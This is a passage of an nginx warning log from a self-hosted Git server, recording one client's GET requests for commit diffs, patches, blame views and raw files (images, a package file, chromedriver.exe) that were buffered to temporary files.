git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +2026/02/17 13:15:34 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000014059 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:15:53 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000014060 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +2026/02/17 13:18:09 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000014061 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +2026/02/17 13:20:49 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000014062 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +2026/02/17 13:22:49 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/06/0000014063 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +2026/02/17 13:24:28 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/06/0000014064 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +2026/02/17 13:25:18 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/06/0000014065 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +2026/02/17 13:34:01 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/06/0000014066 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change" +2026/02/17 13:36:02 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/06/0000014067 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" +2026/02/17 13:38:43 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/07/0000014071 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +2026/02/17 13:39:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/07/0000014072 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" +2026/02/17 13:39:28 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/07/0000014073 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" +2026/02/17 13:39:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/07/0000014074 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" +2026/02/17 13:39:41 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/07/0000014075 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" +2026/02/17 13:39:45 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/07/0000014076 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +2026/02/17 13:39:48 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/07/0000014077 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +2026/02/17 13:39:50 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/07/0000014078 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +2026/02/17 13:39:57 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/07/0000014079 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" +2026/02/17 13:40:04 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/08/0000014080 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" +2026/02/17 13:40:11 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/08/0000014081 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +2026/02/17 13:40:19 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/08/0000014082 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" +2026/02/17 13:40:26 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/08/0000014083 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" +2026/02/17 13:40:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/08/0000014084 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" +2026/02/17 13:40:38 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/08/0000014085 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +2026/02/17 13:40:42 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/08/0000014086 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +2026/02/17 13:40:52 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/08/0000014087 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" +2026/02/17 13:40:58 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/08/0000014088 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" +2026/02/17 13:41:06 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/08/0000014089 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" +2026/02/17 13:41:14 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/09/0000014090 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" +2026/02/17 13:41:20 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/09/0000014091 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" +2026/02/17 13:41:27 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/09/0000014092 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" +2026/02/17 13:41:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/09/0000014093 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" +2026/02/17 13:41:38 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/09/0000014094 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" +2026/02/17 13:41:53 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/09/0000014095 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" +2026/02/17 13:42:00 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/09/0000014096 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" +2026/02/17 13:42:08 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/09/0000014097 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" +2026/02/17 13:42:15 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/09/0000014098 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" +2026/02/17 13:42:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/09/0000014099 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" +2026/02/17 13:42:29 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/10/0000014100 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" +2026/02/17 13:42:35 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/10/0000014101 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" +2026/02/17 13:42:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/10/0000014102 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" +2026/02/17 13:45:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/10/0000014103 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:46:18 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/10/0000014104 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +2026/02/17 13:46:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/10/0000014105 while reading upstream, client: 